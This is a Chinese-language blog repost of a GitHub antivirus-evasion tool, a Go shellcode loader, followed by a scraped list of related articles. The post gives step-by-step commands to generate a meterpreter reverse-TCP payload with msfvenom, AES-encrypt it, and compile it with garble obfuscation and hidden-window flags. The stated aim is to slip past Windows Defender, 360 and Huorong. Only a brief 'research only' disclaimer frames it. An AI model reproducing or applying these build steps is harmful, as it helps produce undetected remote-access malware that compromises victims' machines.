项目作者:HZzz

项目地址:https://github.com/HZzz2/go-shellcode-loader

一、工具介绍

GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。

二、安装与使用

1、获取项目

git clone https://github.com/HZzz2/go-shellcode-loader.git
cd go-shellcode-loader
//下条命令安装第三方混淆库
GitHub地址:https://github.com/burrowers/garble
go install mvdan.cc/garble@latest

2、生成shellcode并base64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.rawbase64 -w 0 -i rev.raw > rev.bs64cat rev.bs64

3、复制到aes-sc.go中的44行替换payload

运行aes-sc.go生成AES加密后的值go run aes-sc.go复制输出的值到go-sc.go中的52行替换payload

4、编译成exe可执行程序

garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go

5、参数解释:

garble(混淆库):-tiny                    删除额外信息                    -literals               混淆文字-seed=random   base64编码的随机种子 go:-w                        去掉调试信息,不能gdb调试了-s                         去掉符号表-H windowsgui    隐藏执行窗口,不占用 cmd 终端。(被查杀率高)-race                    使数据允许竞争检测,编译时改变了生成后的文件特征, 使得杀软无法检测,当然有一天也会失效的。编译后得到go-sc.exe

免杀效果不错。

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

成熟的人眼里满是前途,稚嫩的人眼里满是爱恨情仇

免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​相关推荐

  1. 免杀方法(七)c#xor加载器

    c#是很流行的编程语言,也可以用它来做一个加载器运行shellcode,生成出来的 文件特别的小,可以很好的投递传输. 项目地址https://github.com/antman1p/ShellCod ...

  2. 【工具分享】免杀360火绒的shellcode加载器

    微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...

  3. ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具

    ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录 ShellCode_Loader - Msf&Cobal ...

  4. java 加载shellcode_通用Shellcode加载器

    Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...

  5. shellcode加载器

    不能有全局变量 (其实也是使用了绝对地址) 不能使用常量字符串 char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用//写成 char szB ...

  6. shellcode加载器--从入门到放弃

    文章目录 重剑无锋--代码篇复现 1.C/C++(vs2019) (1).指针执行 shellcode放在data段 shellcode放在栈上,复制到堆上 shellcode放在web服务器上 使用 ...

  7. 免杀方法(四)Python免杀shellcode加载器

    项目作者:HZzz2 项目地址:https://github.com/HZzz2/python-shellcode-loader 一.工具介绍 免杀方式 msfvenom生成raw格式的shellco ...

  8. 网络安全进阶篇之免杀(十四章-7)C#加载器过360

    一. 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件.它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀 ...

  9. 最简单的加载器免杀思路

    本文首发于先知社区:https://xz.aliyun.com/t/9385 这部分源代码开放:https://github.com/MrWQ/HanGuang 最简单的加载器免杀思路 将加载器的变量 ...

最新文章

  1. 机器学习模型部署都有哪些坑?
  2. json对象与字符串互转方法
  3. Linux 环境安装 Node、nginx、docker、vsftpd、gitlab
  4. [剑指offer] 34. 第一个只出现一次的字符
  5. circle函数用法 turtle_Turtle库与Time库基础知识分享(详细)
  6. 一个通过Flash设计与Flex结合开发的网站www.mapgle.cn
  7. 【汇编语言】状态标志符(CF/OF/SF/ZF)在运算(ADD/SUB/ADC/SBB)过程中的响应变化
  8. eq相等,smarty 比较操作符!时间戳
  9. 标识符的命名规定java 0126
  10. php只取时间的下士_PHP 获取时间的各种处理方式!
  11. Gnome2.30 GDM圖片風格設置方式
  12. 原来这么简单就可以实现无纸化办公
  13. 如何在Web App Project 或者 Web Site Project的App_Code 内使用 Profile/ProfileCommon
  14. 天瑞地安科技集团:APP软件如何优化
  15. [导入]Reporting Services 6: 在服务器端报表中筛选数据
  16. 红帽(redhat linux) 初级认证(RHCSA)考点详解
  17. 电机控制程序设计经验
  18. “新产业50人论坛”之清华龙桂鲁教授:量子信息与创新发展
  19. 在linux虚拟机上显示摄像头视频(V4L2编程)
  20. Google基本查询语法

热门文章

  1. php cms 源码小说,PHPMAOS 强大的小说CMS系统
  2. mysql 最后版本_mysql – 如何选择帖子的最后编辑版本?
  3. HTML期末大学生网页设计作业——奇恩动漫HTML (1页面) HTML+CSS+JS网页设计期末课程大作业
  4. 什么是集中权限管理?为什么要集中权限管理?
  5. 计算机三级东莞考点,2016年9月东莞计算机三级四级准考证打印入口,计算机等级考试时间查询...
  6. 计算机二级access选择题题库_全国计算机等级考试二级access选择题包括哪些
  7. 【MM小贴士】从 purchase 到 payment 全流程演示
  8. hive lateral view explode列拆分与行转列用法
  9. 广东石油化工学院计算机考研资料汇总
  10. 面试的技巧!【精品必看】转自猫扑